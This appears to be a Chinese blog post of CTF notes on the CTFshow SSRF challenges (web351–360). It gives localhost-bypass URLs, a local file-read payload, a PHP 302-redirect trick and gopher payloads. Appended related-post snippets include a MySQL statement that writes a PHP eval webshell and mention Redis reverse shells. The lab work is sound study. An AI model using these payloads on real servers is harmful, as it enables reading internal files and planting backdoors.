CTFshow之SSRF

最新推荐文章于 2024-11-16 17:43:15 发布
最新推荐文章于 2024-11-16 17:43:15 发布
阅读量645 收藏
点赞数 1
分类专栏: CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43085611/article/details/120105061
版权
本文详细介绍了多种Web服务器端请求伪造(SSRF)的利用方法,包括不同URL格式的构造,如十六进制表示、DNS重绑定、HTTP头部利用等,并提到了一些常见挑战的解决方案,如代码检测IP范围的绕过。同时,推荐了两个CTF学习资源,帮助读者深入理解SSRF漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

其他师傅都写得很详细了,只是做个简单的笔记。

1 web351

POST

url=file:///var/www/html/flag.php

2 web352

只限制了协议。

url=http://127.0.0.1/flag.php

3 web353

十六进制表示:

url=http://0x7F000007/flag.php

在线转换工具:https://tool.520101.com/wangluo/jinzhizhuanhuan/

4 web354

image-20210904192214123

不知道为什么服务器没有成功。A记录是127.0.0.1的网站: http://sudo.cc/,可以不用解析自己的。本来想使用 DNS 重绑定平台,但是我常用的那个平台现在不能用了。emm

url=http://sudo.cc/flag.php
  • (方便绑定IP)DNS重绑定平台:http://ceye.io/

5 web355

在 CTF从0到1 中有介绍这种利用方式

http://127.1/flag.php

6 web356

  • 127.0.0.1 的特殊写法
http://0/flag.php

7 web357

代码中检测了IP的范围,所以需要使用302或者DNS重绑定。

<?php
header("Location:http://127.0.0.1/flag.php");

8 web358

正则表达式的意思是以http://ctf.开头,以show结尾。

http://ctf.@127.0.0.1/flag.php?show

URL的结构如下:

img

9 web359

  • 使用 gopherus 生成 Payload
  • 把下划线后面的内容url编码一次
  • post:reurl=xxx

10 web360

方法同 web359

参考教程:

  • ctfshow-web入门 ssrf篇_volcano的博客-优快云博客:https://blog.youkuaiyun.com/weixin_45696568/article/details/114434596
  • CTFSHOW SSRF篇_羽的博客-优快云博客:https://blog.youkuaiyun.com/miuzzx/article/details/111992415
ctfshow web入门ssrf
xiaolong22333的博客
04-28 1239
其实刚接触时做过一遍,现在再做一遍巩固一下知识点 文章目录web351web352web353web354web355web356web357 web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1.
ctfshow-ssrf
孤桜懶契
08-21 396
前言 记录web的题目wp,慢慢变强,铸剑。 SSRF SSRF(Server-Side Request Forgery: 服务器端请求第二天) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF 攻击的目标是从网无法访问的内部系统。(因为它是由服务端发起的,所以它能够请求到与它相关而与外部网隔离的内部系统) web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=cu
ctfshow--ssrf
ing_end的博客
04-23 4132
SSRF概述及其危害 *SSRF概述 ​ 强制服务器发送一个攻击者的请求 ​ 互联网上的很多web应用提供了从其他服务器(也可以是本地)获取数据的功能。使用用户指定的URL,web应用可以获取图片(载入图片)、文件资源(下载或读取)。如下图所示,百度提供识图功能。如果链接可以访问任意请求,则存在ssrf漏洞 ​ 用户可以从本地或者URL的方式获取图片资源,交给百度识图处理。如果提交的是URL地址,该应用就会通过URL寻找图片资源。如果web 应用开放了类似于百度识图这样的功能,并且对用户提供的URL和远端
ctfshow——SSRF
qq_55202378的博客
05-02 1409
(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
ctfshow web入门ssrf359,360
xiaolong22333的博客
02-06 1197
记录一下做法,原理啥的还有点懵 web359 打开是登录框,先随便输点什么,然后抓包 发现有个returl参数,并且可以随意更改url,这应该就是我们的利用点了 然后就是gopher协议打mysql,这里用到这个工具gopherus python gopherus.py --exploit mysql 生成一句话木马 select "<?php @eval($_POST['cmd']);?>" into outfile '/var/www/html/2.php'; 记得把_后面那一大段内
ctfshow web入门 SSRF
Sentiment的博客
12-09 860
web351
ctfshow-SSRF
qq_45655564的博客
07-01 528
web351-普通的ssrf本地访问 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?&
CTFshow SSRF(web351-360)
Kradress的博客
03-17 802
表示不允许私有IP地址(例如,10.0.0.0/8,172.16.0.0/12和192.168.0.0/16),而。后面要进行url编码,因为curl还会进行一次url解码。后面要进行url编码,因为curl还会进行一次url解码。显示网页内容,说明存在SSRF漏洞,那应该就是用。因为不能用私网,所以这题还是可以用。题目hint:打无密码的mysql。发现是一个登录框,抓个包看看,输入。,用于过滤和验证输入的IP地址。,这里可以用进制转换绕过。的返回结果,直接写马。的返回结果,直接写马。
[CTFSHOW]SSRF
Y4tacker的博客
01-12 1893
web351 首先代码审计,简简单单的使用php的curl,发现没有过滤,尝试读取本地文件 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_clo
ctf_show笔记篇(web入门---SSRF)
whale_waves的博客
04-04 1323
ssrf产生原理: 服务端存在网络请求功能/函数,例如:file_get_contens()这一类类似于curl 这种函数传入的参数用户是可控的 没有对用户输入做过滤导致的ssrf漏洞 ssrf利用: 用于探测内网服务以及端口 探针存活主机以及开放服务 探针是否存在redis服务(未授权访问, 相当于是可以访问到redis服务并且开发人员不严谨没有设置密码, 因为默认是没有密码的, 或者说开发者设置了密码但是是弱口令), 利用定时任务反弹shell
ctfshow-web入门-SSRFweb351-web360)
最新发布
Welcome To Myon'Blog !
11-16 1439
通过 filter_var() 验证得到的 IP 地址是否为有效的公共 IP 地址,并且不是私有或保留地址。使用 gethostbyname() 将 URL 中的域名解析为对应的 IP 地址。使用 file_get_contents() 获取并输出该 URL 对应的内容。限制只能使用 http 或者 https 协议,并且禁止本地地址访问。匹配以 http://ctf. 开头,并且以 show 结尾。看到 curl_exec 函数,很典型的 SSRF。这次检测的是 127.0. 开头的。
CTFshow-WEB入门-SSRF
feng的博客
02-18 1724
前言 开始学习SSRF,学习文章: SSRF 学习记录(需要fq) 比较简单的题目就直接放payload了,不做解释。 web351 url=http://127.0.0.1/flag.php web352 scheme必须是http或者https,但是不能有127.0.0.1或者localhost。这个绕过技巧很多了,列具一些常用的吧: 进制绕过 url=http://0x7F000001/flag.php 0.0.0.0绕过 url=http://0.0.0.0/flag.php 短标签绕过,但是这
SSRF之GOPHER协议利用
qq_61553520的博客
05-22 832
GOPHER协议是一种比HTTP协议还要古老的协议,默认工作端口70,但是gopher协议在SSRF漏洞利用上比HTTP协议更有优势。
ctfshowSSRF
遇事不决冲冲冲
10-02 3586
web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 没有防护直
CTFshow刷题日记-WEB-SSRFweb351-360)SSRF总结
Love&Share
09-28 8445
SSRF基础 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 相关函数和类 file_get_contents():将整个文件或一个url所指向的文件读入一个字符串中 readfile():输出一个文件的内容 fsockopen():打开一个网络连接或者一个Unix 套接字连接
ctfshow web入门 ssrf web351~web360
qq_62989306的博客
09-13 1308
ssrf之127.0.0.1绕过、域名指向、302跳转、DNS重定向、gopher打mysql、redis……
CTFshow SSRF
starttv的博客
11-23 1629
服务端请求伪造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。
ctfshow ssrf
m0_62422842的博客
07-10 803
ctfshow入门中的ssrf
[ctfshow-web入门]SSRF
nareku的博客
07-22 940
上来就是代码审计ssrf就是利用我们可以访问到的服务器,对其服务器下面的内网进行探测,也可以理解为服务器拥有外网ip,而我们要访问的电脑则是在公网ip进行nat后分配的内网ip构造payload(POST方式)......
ctfshow ssrf
08-16
- *3* [ctfshow ssrf](https://blog.youkuaiyun.com/weixin_52240463/article/details/122659261)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值